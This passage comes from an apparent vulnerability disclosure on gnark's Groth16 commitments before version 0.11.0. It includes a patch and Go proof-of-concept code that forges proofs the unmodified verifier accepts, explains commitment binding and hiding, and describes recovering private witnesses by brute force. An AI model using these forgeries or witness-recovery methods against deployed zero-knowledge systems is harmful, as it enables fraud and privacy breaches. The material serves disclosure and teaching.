-func Prove(r1cs *cs.R1CS, pk *ProvingKey, fullWitness witness.Witness, opts ...backend.ProverOption) (*Proof, error) {

+func Prove(r1cs *cs.R1CS, pk *ProvingKey, fullWitness witness.Witness, fakeCommitments []curve.G1Affine, opts ...backend.ProverOption) (*Proof, error) {

opt, err := backend.NewProverConfig(opts...)

if err != nil {

return nil, fmt.Errorf("new prover config: %w", err)

@@ -91,10 +91,7 @@ func Prove(r1cs *cs.R1CS, pk *ProvingKey, fullWitness witness.Witness, opts ...b

privateCommittedValues[i][j].SetBigInt(inJ)

}

- var err error

- if proof.Commitments[i], err = pk.CommitmentKeys[i].Commit(privateCommittedValues[i]); err != nil {

- return err

- }

+ proof.Commitments[i] = fakeCommitments[i]

opt.HashToFieldFn.Write(constraint.SerializeCommitment(proof.Commitments[i].Marshal(), hashed, (fr.Bits-1)/8+1))

hashBts := opt.HashToFieldFn.Sum(nil)

diff --git a/backend/groth16/groth16.go b/backend/groth16/groth16.go

index ca5b8bdc..36f3d459 100644

--- a/backend/groth16/groth16.go

+++ b/backend/groth16/groth16.go

@@ -179,7 +179,8 @@ func Prove(r1cs constraint.ConstraintSystem, pk ProvingKey, fullWitness witness.

if icicle_bn254.HasIcicle {

return icicle_bn254.Prove(_r1cs, pk.(*icicle_bn254.ProvingKey), fullWitness, opts...)

}

- return groth16_bn254.Prove(_r1cs, pk.(*groth16_bn254.ProvingKey), fullWitness, opts...)

+ panic("changed stuff for poc")

+ //return groth16_bn254.Prove(_r1cs, pk.(*groth16_bn254.ProvingKey), fullWitness, opts...)

case *cs_bw6761.R1CS:

return groth16_bw6761.Prove(_r1cs, pk.(*groth16_bw6761.ProvingKey), fullWitness, opts...)

The patch only makes a very small change: the Groth16 prover for the bn254 elliptic curve takes one extra argument, `fakeCommitments`

, and instead of calculating the commitments, it just uses the ones that were passed with `fakeCommitments`

. Because the signature of the `Prove`

function was changed, we also need to fix one other place of the codebase to make it compile (the generic `Prove`

function for Groth16, without specializing to concrete types for a specific curve).

By using a patched version of gnark as above, the following code then demonstrates the issue:

`package main`

import (

"crypto/sha256"

"fmt"

"log"

"math/big"

"math/rand"

"reflect"

"unsafe"

"github.com/consensys/gnark-crypto/ecc"

"github.com/consensys/gnark-crypto/ecc/bn254"

"github.com/consensys/gnark-crypto/ecc/bn254/fr"

"github.com/consensys/gnark-crypto/ecc/bn254/fr/hash_to_field"

fiatshamir "github.com/consensys/gnark-crypto/fiat-shamir"

"github.com/consensys/gnark/backend"

"github.com/consensys/gnark/backend/groth16"

groth16_bn254 "github.com/consensys/gnark/backend/groth16/bn254"

"github.com/consensys/gnark/constraint"

cs_bn254 "github.com/consensys/gnark/constraint/bn254"

"github.com/consensys/gnark/frontend"

"github.com/consensys/gnark/frontend/cs/r1cs"

)

// Our circuit has two private witnesses

type Circuit struct {

A frontend.Variable

B frontend.Variable

}

func (circuit *Circuit) Define(api frontend.API) error {

commitCompiler, ok := api.Compiler().(frontend.Committer)

if !ok {

return fmt.Errorf("compiler does not commit")

}

// We commit to both A and B separately, obtaining two challenges.

challenge_A, err := commitCompiler.Commit(circuit.A)

if err != nil {

return err

}

challenge_B, err := commitCompiler.Commit(circuit.B)

if err != nil {

return err

}

// To have some constraints involving the private witnesses and challenges, we constraint them to be nonzero.

api.AssertIsDifferent(challenge_A, 0)

api.AssertIsDifferent(challenge_B, 0)

api.AssertIsDifferent(circuit.A, 0)

api.AssertIsDifferent(circuit.B, 0)

// The two challenges should depend on the value assigned to the respective circuit variables

// in such a way that it is impossible to change the underlying circuit variable's values

// without the corresponding challenges changing as well.

// We demonstrate that this does not hold and we can choose the circuit variable being committed to

// *after* fixing the challenge that should randomly depend on it, by constraining

// the challenge to be a constant. We will still be able to prove the circuit for

// any value assigned to the circuit variables.

var hashOfZero fr.Element

var hashOfZeroBigInt big.Int

hashOfZeroBigInt.SetString("14057090015281774264105022686285549399478565317353443989948588114876049265504", 10)

hashOfZero.SetBigInt(&hashOfZeroBigInt)

fmt.Println("Constraining the challange based on the commitment to A to be the hash of zero: ", hashOfZero.String())

api.AssertIsEqual(challenge_A, hashOfZero)

return nil

}

func main() {

// Setup circuit

var circ Circuit

ccs, err := frontend.Compile(ecc.BN254.ScalarField(), r1cs.NewBuilder, &circ)

if err != nil {

panic(err)

}

// Assigning some random values.

A := *big.NewInt(rand.Int63())

B := *big.NewInt(rand.Int63())

var w Circuit

w.A = A

w.B = B

fmt.Println("Assigning random value A = ", A.String())

fmt.Println("Assigning random value B = ", B.String())

// Running setup, and prover.

witness, err := frontend.NewWitness(&w, ecc.BN254.ScalarField())

if err != nil {

panic(err)

}

witnessPublic, err := witness.Public()

if err != nil {

panic(err)

}

pk, vk, err := groth16.Setup(ccs)

if err != nil {

panic(err)

}

// Converting proving key to concrete type

pkConcrete, ok := pk.(*groth16_bn254.ProvingKey)

if !ok {

log.Fatal("unexpected type for proving key")

}

// Construct fake commitment, and associated proof of knowledge.

// In this case, we make the first commitment zero.

commitments, commitmentPok := fakeCommitment(*pkConcrete, A, B, *big.NewInt(0), *big.NewInt(0))

// groth16_bn254.Prove has been modified to use our supplied commitments instead of

// calculating the legitimate ones.

fakeProof, err := groth16_bn254.Prove(ccs.(*cs_bn254.R1CS), pkConcrete, witness, commitments)

if err != nil {

panic(err)

}

// The proof of knowledge for the commitment calculated by groth16_bn254.Prove will not

// fit our fake commitments, so we replace it with the previously calculated pok.

fakeProof.CommitmentPok = commitmentPok

// groth16.Verify has not been modified, yet it accepts our proof with incorrect commitments.

err = groth16.Verify(fakeProof, vk, witnessPublic)

if err != nil {

panic(err)

}

}

// Constructs fake commitments. Only works for two commitments to one circuit variable each.

// Will fake the first commitment to be FirstCommitmentA*Base[0] + FirstCommitmentB*Base[1]

// instead of the expected AReal*Base[0]. Will also calculate the corresponding proof of knowledge.

func fakeCommitment(pk groth16_bn254.ProvingKey, AReal big.Int, BReal big.Int, FirstCommitmentA big.Int, FirstCommitmentB big.Int) ([]bn254.G1Affine, bn254.G1Affine) {

expConfig := ecc.MultiExpConfig{

NbTasks: 1,

}

// Casting values to Fr elements

var ARealFr fr.Element

var BRealFr fr.Element

var FirstCommitmentAFr fr.Element

var FirstCommitmentBFr fr.Element

ARealFr.SetBigInt(&AReal)

BRealFr.SetBigInt(&BReal)

FirstCommitmentAFr.SetBigInt(&FirstCommitmentA)

FirstCommitmentBFr.SetBigInt(&FirstCommitmentB)

// Get the commitment key basis elements

basisPointsA, err := getBasisField(&pk.CommitmentKeys[0])

if err != nil {

panic(err)

}

basisPointsB, err := getBasisField(&pk.CommitmentKeys[1])

if err != nil {

panic(err)

}

commitments := make([]bn254.G1Affine, 2)

exponents := make([]fr.Element, 2)

// commitments[0] = FCA * Base[0] + FCB * Base[1]

exponents[0] = FirstCommitmentAFr

exponents[1] = FirstCommitmentBFr

commitments[0].MultiExp([]bn254.G1Affine{basisPointsA[0], basisPointsB[0]}, exponents, expConfig)

// commitments[1] = (A - FCA) * Base[0] + (B - FCB) * Base[1]

exponents[0].Sub(&ARealFr, &FirstCommitmentAFr)

exponents[1].Sub(&BRealFr, &FirstCommitmentBFr)

commitments[1].MultiExp([]bn254.G1Affine{basisPointsA[0], basisPointsB[0]}, exponents, expConfig)

//commitmentPublicInputs, commitmentsSerialized, err := getCommitmentsHashes(commitments)

_, commitmentsSerialized, err := getCommitmentsHashes(commitments)

if err != nil {

panic(err)

}

//The printout below can be used to get that constant we use in the circuit constraints

//fmt.Println("first commitment public input = ", commitmentPublicInputs[0].String())

// Get the challenge for commitment folding.

r, err := getChallenge(commitmentsSerialized)

if err != nil {

panic(err)

}

// Calculation of the proof of knowledge going along with the commitments:

// commitments[0] = FCA * Base[0] + FCB * Base[1]

// commitments[1] = (A - FCA) * Base[0] + (B - FCB) * Base[1]

// foldedCommitment = (FCA + r*(A - FCA)) * Base[0] + (FCB + r*(B - FCB)) * Base[1]

exponents[0].Mul(&exponents[0], &r)

exponents[0].Add(&exponents[0], &FirstCommitmentAFr)

exponents[1].Mul(&exponents[1], &r)

exponents[1].Add(&exponents[1], &FirstCommitmentBFr)

basisExpSigmaPointsA, err := getBasisExpSigmaField(&pk.CommitmentKeys[0])

if err != nil {

panic(err)

}

basisExpSigmaPointsB, err := getBasisExpSigmaField(&pk.CommitmentKeys[1])

if err != nil {

panic(err)

}

var pok bn254.G1Affine

pok.MultiExp([]bn254.G1Affine{basisExpSigmaPointsA[0], basisExpSigmaPointsB[0]}, exponents, expConfig)

return commitments, pok

}

// This function calculates the commitment hashes added to the public inputs,

// and calculates the commitmentsSerialized value used for calculating the challenge in commitment folding.

// The code here is mostly copied from gnark's backend/groth16/bn254/verify.go

func getCommitmentsHashes(commitments []bn254.G1Affine) ([]fr.Element, []byte, error) {

opt, err := backend.NewVerifierConfig()

if err != nil {

return nil, nil, fmt.Errorf("new verifier config: %w", err)

}

if opt.HashToFieldFn == nil {

opt.HashToFieldFn = hash_to_field.New([]byte(constraint.CommitmentDst))

}

commitmentHashesAsPublicWitnesses := make([]fr.Element, len(commitments))

commitmentsSerialized := make([]byte, len(commitments)*fr.Bytes)

commitmentPrehashSerialized := make([]byte, bn254.SizeOfG1AffineUncompressed)

for i := range len(commitments) {

copy(commitmentPrehashSerialized, commitments[i].Marshal())

opt.HashToFieldFn.Write(commitmentPrehashSerialized[:bn254.SizeOfG1AffineUncompressed])

hashBts := opt.HashToFieldFn.Sum(nil)

opt.HashToFieldFn.Reset()

nbBuf := fr.Bytes

if opt.HashToFieldFn.Size() < fr.Bytes {

nbBuf = opt.HashToFieldFn.Size()

}

var res fr.Element

res.SetBytes(hashBts[:nbBuf])

commitmentHashesAsPublicWitnesses[i] = res

copy(commitmentsSerialized[i*fr.Bytes:], res.Marshal())

}

return commitmentHashesAsPublicWitnesses, commitmentsSerialized, nil

}

// copied from gnark-crypto's source code, ecc/bn254/fr/pedersen/pedersen.go

// (it is a private function, so we can't call it)

func getChallenge(fiatshamirSeeds ...[]byte) (r fr.Element, err error) {

// incorporate user-provided seeds into the transcript

t := fiatshamir.NewTranscript(sha256.New(), "r")

for i := range fiatshamirSeeds {

if err = t.Bind("r", fiatshamirSeeds[i]); err != nil {

return

}

}

// obtain the challenge

var rBytes []byte

if rBytes, err = t.ComputeChallenge("r"); err != nil {

return

}

r.SetBytes(rBytes) // TODO @Tabaie Plonk challenge generation done the same way; replace both with hash to fr?

return

}

// getBasisField extracts the unexported basis field from a given ProvingKey.

// basis was renamed to Basis and thus made public in newer versions,

// however for gnark 0.10.0, a version of gnark-crypto is used in which the field was still private.

func getBasisField(commitmentPk interface{}) ([]bn254.G1Affine, error) {

// Reflect on the pointer

commitmentPkValue := reflect.ValueOf(commitmentPk)

if commitmentPkValue.Kind() != reflect.Ptr || commitmentPkValue.Elem().Kind() != reflect.Struct {

return nil, fmt.Errorf("expected a pointer to a struct")

}

// Access the 'basis' field

basisField := commitmentPkValue.Elem().FieldByName("basis")

if !basisField.IsValid() {

return nil, fmt.Errorf("field 'basis' not found")

}

if !basisField.CanInterface() {

// To access an unexported field, we need to bypass safety

basisField = reflect.NewAt(basisField.Type(), unsafe.Pointer(basisField.UnsafeAddr())).Elem()

}

basisFieldConcrete, ok := basisField.Interface().([]bn254.G1Affine)

if !ok {

return nil, fmt.Errorf("failed to type assert to []bn254.G1Affine")

}

return basisFieldConcrete, nil

}

// Like getBasisField but for basisExpSigma

func getBasisExpSigmaField(commitmentPk interface{}) ([]bn254.G1Affine, error) {

// Reflect on the pointer

commitmentPkValue := reflect.ValueOf(commitmentPk)

if commitmentPkValue.Kind() != reflect.Ptr || commitmentPkValue.Elem().Kind() != reflect.Struct {

return nil, fmt.Errorf("expected a pointer to a struct")

}

// Access the 'basis' field

basisField := commitmentPkValue.Elem().FieldByName("basisExpSigma")

if !basisField.IsValid() {

return nil, fmt.Errorf("field 'basisExpSigma' not found")

}

if !basisField.CanInterface() {

// To access an unexported field, we need to bypass safety

basisField = reflect.NewAt(basisField.Type(), unsafe.Pointer(basisField.UnsafeAddr())).Elem()

}

basisFieldConcrete, ok := basisField.Interface().([]bn254.G1Affine)

if !ok {

return nil, fmt.Errorf("failed to type assert to []bn254.G1Affine")

}

return basisFieldConcrete, nil

}

Running this program will produce output such as the following:

`17:16:43 INF compiling circuit`

17:16:43 INF parsed circuit inputs nbPublic=0 nbSecret=2

Constraining the challange based on the commitment to A to be the hash of zero: 14057090015281774264105022686285549399478565317353443989948588114876049265504

17:16:43 INF building constraint builder nbConstraints=5

Assigning random value A = 2593177307956940674

Assigning random value B = 228695105607157038

17:16:43 DBG constraint system solver done nbConstraints=5 took=0.239835

17:16:43 DBG prover done acceleration=none backend=groth16 curve=bn254 nbConstraints=5 took=3.831231

17:16:43 DBG verifier done backend=groth16 curve=bn254 took=4.448234

The values assigned to the circuit variables `A`

and `B`

will be fresh, random values each time, but nevertheless, verification does pass for a circuit constraining the challenge based on the commitment to circuit variable `A`

to be a specific constant.

### The Fix

After we reported the above vulnerability to gnark, the protocol regarding the proof of knowledge associated to the commitments was changed to the variant using $k+1$ pairings that we discussed above. This fix is included starting from version 0.11.0.

## Commitment Schemes

There is a second vulnerability associated to the commitments as used by gnark up to version 0.10.0, related to the proof scheme’s zero-knowledge property.

But before getting into that vulnerability, let us take a step back from the particulars of Groth16 and gnark’s exension to it and discuss what it actually means to talk about commitments. A commitment scheme is a way for a committer to commit to some value in a way that *binds* them to it. The value should be *hidden* from the receiver of the commitment, but the committer should be able to *open* the commitment at some later time, thereby revealing the committed value and convincing the receiver that this was the value they had committed to all along. More precisely, a commitment scheme of the type relevant for us has two main phases as follows:

**Commitment**: The committer runs a commitment algorithm $\mathcal{C}$ that takes as input a value $x$ (from a predefined set) as well as randomness; outputs $\mathcal{C}(x) = (C, d)$, consisting of a commitment $C$ and some extra decommitment information $d$. While $C$ can be published, the committer will keep $d$ for themselves, as this is what they need to open the commitment later. In some cases, $d$ might not be needed.

**Opening**: At some later time, the committer publishes $x$ and $d$. Other parties can now run a verification algorithm $\mathcal{V}$ that takes $((C, d), x)$ as input and either accepts (returns 1) or rejects (returns 0).

The idea is that the verification algorithm should only accept $((C, d), x)$ if $x$ is the value that was used as the input to the commitment algorithm that originally produced $C$. Also, we don’t want it to be possible for anyone to recover $x$ from just $C$. To be a bit more precise, we can define the following properties such a scheme might satisfy:

**Completeness**: The verification algorithm accepts on data produced by the commitment algorithm: $\mathcal{V}(\mathcal{C}(x), x) = 1$.

**Binding**: It is infeasible for an attacker to produce $C, x, x', d, d'$ so that $\mathcal{V}(\mathcal{C}(x), x) = 1$ and $\mathcal{V}(\mathcal{C}(x'), x') = 1$ but $x\neq x'$. The upshot of this property is that once $C$ is published, the only value the committer can open $C$ to is the one they originally used when computing $C$.

**Hiding**: Given only $C$, an attacker cannot recover the value $x$ committed to via $C$. To be more precise, we could ask for this to be computationally infeasible (computationally hiding), but we could also ask for this to be truly impossible because for any $x$ there exists a $d$ such that $C$ can be opened to $x$, and each $x$ is equally probable as long as the committer chose $d$ to be uniformly random (perfect hiding).

A commitment scheme that is often used is the Pedersen commitment scheme. To introduce it, let $G$ be an abelian group with $p$ elements (with $p$ a prime) and $g_1, \dots, g_n, h$ nonzero elements of $G$. We now describe how we can use Pedersen commitments to commit to a tuple $(x_1, \dots, x_n)$ of elements of $\mathbb{F}_p$.

**Commitment**: Given $(x_1, \dots, x_n)$, a uniformly random element $d\in\mathbb{F}_p$ is sampled. The commitment and decommitment information is then given by $\mathcal{C}(x) = (C, d) = (d \cdot h + \sum_{i=1}^n x_i \cdot g_i, d)$.

**Verification**: The verification algorithm returns 1 if and only if the equality $C = d \cdot h + \sum_{i=1}^n x_i \cdot g_i$ holds.

It is immediate that this scheme is complete as defined above. It is also perfectly hiding. This can be seen as follows: fix $x$ and consider the unformly random distribution on $\mathbb{F}_p$ for $d$. If $d$ is uniformly random, then $d\cdot h$ is uniformly random as well, as $h$ is nonzero and multiplication by a nonzero element in $\mathbb{F}_p$ is a bijection. Similarly, adding a constant is a bijection as well, so $C = d \cdot h + \sum_{i=1}^n x_i \cdot g_i$ is uniformly random. In particular, the distribution of $C$ is the same no matter what $x$ was, and hence given $C$, all values for $x$ are equally probable, as long as $d$ is chosen uniformly random.

How about the binding property? The answer to this depends on the group used. For example, if we used $G = \mathbb{Z}/p\mathbb{Z}$, then this scheme would not be binding at all. Indeed, given a fixed $C$, finding tuples $(x_1, \dots, x_n,d)$ so that $\mathcal{V}((C, d), (x_1, \dots, x_n)) = 1$ amounts to solving the linear equation $C = d \cdot h + \sum_{i=1}^n x_i \cdot g_i$. This is easily doable; given any $x_1, \dots, x_n$ we can use $d = h^{-1}\cdot \left(C - \sum_{i=1}^n x_i \cdot g_i\right)$.

The problem of solving equations of the form $C = d \cdot h + \sum_{i=1}^n x_i \cdot g_i$ in $G$ for $d, x_1, \dots, x_n$ if $h$ and $g_1, \dots, g_n$ are uniformly random elements of $G$ is called the discrete log (relation) problem. That the discrete log problem is hard for $G$ means that it is computatationally intractible to solve such equations. So the Pedersen commitment scheme is computationally binding if the discrete logarithm problem is hard in $G$ and $h$ and $g_1, \dots, g_n$ were chosen as independent uniformly random elements of $G$. Note that $h, g_1, \dots, g_n$ being independent and uniformly random is necessary, as it is easy to solve the given equation if, for example, $h=g_1=\cdots=g_n$.

## The Zero-Knowledge Vulnerability

Let us now get back to gnark’s extension to Groth16. We will again use the notation from before. As we discussed, the commitments that a gnark Groth16 proof might come with have the form $D_i = \sum_{j \in \mathcal{J}_i } a_j\cdot L_j$. The $a_j$ are private witnesses,^{2} and $L_j$ are points on an elliptic curve for which the discrete logarithm problem is assumed to be hard. But are these commitments $D_i$ rebinding and hiding? We will first begin with the binding property and then discuss the failure for the commitments to be hiding. The commitments not being hiding implies that the proving system does not satisfy zero knowledge, and we discuss the practical impact of this. We also discuss how the standard library’s range checks use commitments, and we provide a proof of concept in which private witnesses are recovered from range checks.

### The Binding Property of the Commitments

In this subsection, we consider under which conditions the commitments may have the binding property. By the discussion in the previous section, the commitment will be computationally binding as long as the points $L_j$ are independent uniformly random elements of the elliptic curve.

Before discussing under which condition this property might hold, let us first point out that, unlike the general idea of commitments, the commitments of gnark’s Groth16 extension are not intended to be opened. That the commitment is binding, as defined above, is thus actually not really that relevant.

What is more relevant is that $\mathcal{H}(D_i)$ acts as a random function of the assignments of the circuit variables committed to, as this is what is needed to ultimately use the hash of the commitment as a random challenge depending on the committed-to circuit variables. If we consider the case of only a single commitment, and $\mathcal{H}$ may be treated as a random function, then this requirement essentially boils down to the points $L_j$ being indistinguishable from being independently uniformly random from the perspective of the prover as well and thus is equivalent to the commitment being binding. If there is more than one commitment, then an additional question arises whether the commitments can be treated separately or not. This is precisely what the soundness vulnerability discussed above is about.

Getting back to the binding property, the condition that the relevant $L_j$ are independent and uniformly random is not satisfied in general. Roughly, if the coefficients of some circuit variables in constraints always satisfy a linear relation,^{3} then the associated $L_j$ will also satisfy this relation.

To illustrate what we mean by this, suppose we are considering a single commitment $D$ to two circuit variables $x$ and $y$, with $D = x\cdot L_x + y \cdot L_y$. There may be constraints imposed such as $(c\cdot x+d\cdot y) \cdot (2\cdot c\cdot x + 2\cdot d\cdot y) = z$ or $c\cdot x + d\cdot y = 42$. The property to note here is that the coefficient for $y$ in each factor and in the linear term is always the same multiple $\frac{d}{c}$ of the coefficient for $x$. It will then hold that also $L_y = \frac{d}{c}\cdot L_x$. The upshot of the observation that $d\cdot L_x = c \cdot L_y$ is that the prover knows a relation $d\cdot L_x - c \cdot L_y = 0$, so if they originally commited to $(x, y)$, they may also open the commitment to $(x + r\cdot d, y - r\cdot c)$ for any $r\in \mathbb{F}_p$. Taking the point of view where $\mathcal{H}(D)$ will be used as a random challenge depending on $x$ and $y$, the prover has, after knowing what the challenge $\mathcal{H}(D)$ will be, still one degree of freedom to adjust $x$ and $y$. However, this actually does not help the malicious prover. This is because the test being performed using the challenge value (like a Schwartz-Zippel–style equality check) can only depend on $c\cdot x + d\cdot y$ by our assumption, and this value does not change with this adjustment!

We won’t go into detail why the above holds in general, as this will involve the details of Groth16 and its arithmetization in more depth than we cover in this article. The following example demonstrates the observation in practice, however. In it, we define a circuit with two private witnesses, which we commit together. We add constraints as above and then check that the relation $d\cdot L_x = c \cdot L_y$ indeed holds.

`package main`

import (

"fmt"

"log"

"math/big"

"reflect"

"unsafe"

"github.com/consensys/gnark-crypto/ecc"

"github.com/consensys/gnark-crypto/ecc/bn254"

"github.com/consensys/gnark/backend/groth16"

groth16_bn254 "github.com/consensys/gnark/backend/groth16/bn254"

"github.com/consensys/gnark/frontend"

"github.com/consensys/gnark/frontend/cs/r1cs"

)

const c = 5

const d = 7

type Circuit struct {

SecretWitnessX frontend.Variable

SecretWitnessY frontend.Variable

}

func (circuit *Circuit) Define(api frontend.API) error {

commitCompiler, ok := api.Compiler().(frontend.Committer)

if !ok {

return fmt.Errorf("compiler does not commit")

}

_, err := commitCompiler.Commit(circuit.SecretWitnessX, circuit.SecretWitnessY)

if err != nil {

return err

}

// We add some constraints where the ratio between the coefficients for Y and X is always d/c.

sum1 := api.Add(api.Mul(c, circuit.SecretWitnessX), api.Mul(d, circuit.SecretWitnessY))

sum2 := api.Add(api.Mul(2*c, circuit.SecretWitnessX), api.Mul(2*d, circuit.SecretWitnessY))

api.Mul(sum1, sum2)

api.AssertIsEqual(sum1, c*42+d*47)

return nil

}

func main() {

// Setup circuit

var circ Circuit

ccs, err := frontend.Compile(ecc.BN254.ScalarField(), r1cs.NewBuilder, &circ)

if err != nil {

panic(err)

}

// Assigning some values.

var w Circuit

w.SecretWitnessX = 42

w.SecretWitnessY = 47

// Running setup and prover.

witness, err := frontend.NewWitness(&w, ecc.BN254.ScalarField())

if err != nil {

panic(err)

}

witnessPublic, err := witness.Public()

if err != nil {

panic(err)

}

pk, vk, err := groth16.Setup(ccs)

if err != nil {

panic(err)

}

pkConcrete, ok := pk.(*groth16_bn254.ProvingKey)

if !ok {

log.Fatal("unexpected type for proving key")

}

proof, err := groth16.Prove(ccs, pk, witness)

if err != nil {

panic(err)

}

commitmentPk := &pkConcrete.CommitmentKeys[0]

basisFieldConcrete, err := getBasisField(commitmentPk)

if err != nil {

fmt.Println("Error:", err)

return

}

// Check the linear relation satisfied by the basis elements for the commitments

scaledBasisX := new(bn254.G1Affine)

scaledBasisX.ScalarMultiplication(&basisFieldConcrete[0], big.NewInt(d))

scaledBasisY := new(bn254.G1Affine)

scaledBasisY.ScalarMultiplication(&basisFieldConcrete[1], big.NewInt(c))

fmt.Println("d*basis[0] == c*basis[1] :", *scaledBasisX == *scaledBasisY)

err = groth16.Verify(proof, vk, witnessPublic)

if err != nil {

panic(err)

}

}

// getBasisField extracts the unexported basis field from a given ProvingKey.

// basis was renamed to Basis and thus made public in newer versions,

// however for gnark 0.10.0, a version of gnark-crypto is used in which the field was still private.

func getBasisField(commitmentPk interface{}) ([]bn254.G1Affine, error) {

// Reflect on the pointer

commitmentPkValue := reflect.ValueOf(commitmentPk)

if commitmentPkValue.Kind() != reflect.Ptr || commitmentPkValue.Elem().Kind() != reflect.Struct {

return nil, fmt.Errorf("expected a pointer to a struct")

}

// Access the 'basis' field

basisField := commitmentPkValue.Elem().FieldByName("basis")

if !basisField.IsValid() {

return nil, fmt.Errorf("field 'basis' not found")

}

if !basisField.CanInterface() {

// To access an unexported field, we need to bypass safety

basisField = reflect.NewAt(basisField.Type(), unsafe.Pointer(basisField.UnsafeAddr())).Elem()

}

basisFieldConcrete, ok := basisField.Interface().([]bn254.G1Affine)

if !ok {

return nil, fmt.Errorf("failed to type assert to []bn254.G1Affine")

}

return basisFieldConcrete, nil

}

The output will be as follows:

`13:17:21 INF compiling circuit`

13:17:21 INF parsed circuit inputs nbPublic=0 nbSecret=2

13:17:21 INF building constraint builder nbConstraints=2

13:17:21 DBG constraint system solver done nbConstraints=2 took=0.771787

13:17:21 DBG prover done acceleration=none backend=groth16 curve=bn254 nbConstraints=2 took=2.421542

d*basis[0] == c*basis[1] : true

13:17:21 DBG verifier done backend=groth16 curve=bn254 took=3.512609

We have now described one specific way in which the commitment is not binding or $\mathcal{H}(D_i)$ not a random function of the committed-to circuit variables, but we have also argued why this is not an issue in practice. This raises the question whether this is the only manner in which this property fails, so that $\mathcal{H}(D_i)$ satisfies the security property required of it for use as a random challenge needed in practice. The author expects that this is the case, but we have not attempted to formally define the required property and prove it.

### The Hiding Property of the Commitments

In comparison with Pedersen commitments discussed before, the commitments used by gnark, being of the form $D_i = \sum_{j \in \mathcal{J}_i } a_j\cdot L_j$, lack the blinding summand $d\cdot h$, which is what makes Pedersen commitments perfectly hiding. The commitments used by gnark (before version 0.11.0) were thus not hiding. What does this mean in practice?

Let us consider a single commitment $D = \sum_{i=1}^{k} a_i \cdot L_i$. Suppose the attacker, who has only access to $D$ and $L_i$, but not the original $a_i$ used to calculate $D$, makes a guess for the values of $a_i$, with the guessed values being $a'_i$ for $a_i$. Then the attacker can verify whether that guess is correct by checking $D \stackrel{?}{=} \sum_{i=1}^k a'_i \cdot L_i$. If equality holds, then either $a_i = a'_i$ for all $1 \leq i \leq k$ or a linear relation $\sum_{i=1}^k (a_i - a'_i) \cdot L_i$ has been found, which we assume does not occur in practice by the hardness of the discrete logarithm problem as long as $L_1, \dots, L_k$ are independently uniformly random. Hence, in practice (putting aside exceptions to the binding property discussed in the previous subsection), the equality holding implies that the attacker found the original values used by the prover.

An attacker can thus use $D$ and $L_1, \dots, L_k$ to brute-force the original values of $a_1, \dots, a_k$. If the attacker has no information about what $a_1, \dots, a_k$ might be — in other words, from their perspective, $(a_1, \dots, a_k)$ is a uniformly random element of $\mathbb{F}_p^k$ — then this will be infeasible in practice, as the search space will be intractably large. However, if there is only a small number of possibilities for each $a_1$ to $a_k$, then it may be feasible to search the entire search space. For example, $a_i$ might be a leaf in a Merkle tree, with the circuit verifying a Merkle inclusion proof and being intended to protect knowledge of which leaf was used in the proof. If the leaves are publicly known, then it might be feasible for an attacker to verify guesses for each leaf.

The failure of the commitments to be binding is related to the extended Groth16 system’s zero-knowledge property. The zero-knowledge property requires that it should be impossible to extract any knowledge about the private witnesses from the proof, except that the prover knows private witnesses that satisfy the circuit’s constraints. The just described issue implies that it is possible to extract information about those private witnesses that are involved in commitments, violating the zero-knowledge property.

The following code demonstrates this. We define a simple circuit, with a single private witness that is committed. We assign the private witness the value `42`

. The code then checks that the commitment that comes with the proof is indeed given by 42 times the corresponding basis element that is part of the proving key.

`package main`

import (

"fmt"

"log"

"math/big"

"reflect"

"unsafe"

"github.com/consensys/gnark-crypto/ecc"

"github.com/consensys/gnark-crypto/ecc/bn254"

"github.com/consensys/gnark/backend/groth16"

groth16_bn254 "github.com/consensys/gnark/backend/groth16/bn254"

"github.com/consensys/gnark/frontend"

"github.com/consensys/gnark/frontend/cs/r1cs"

)

const secret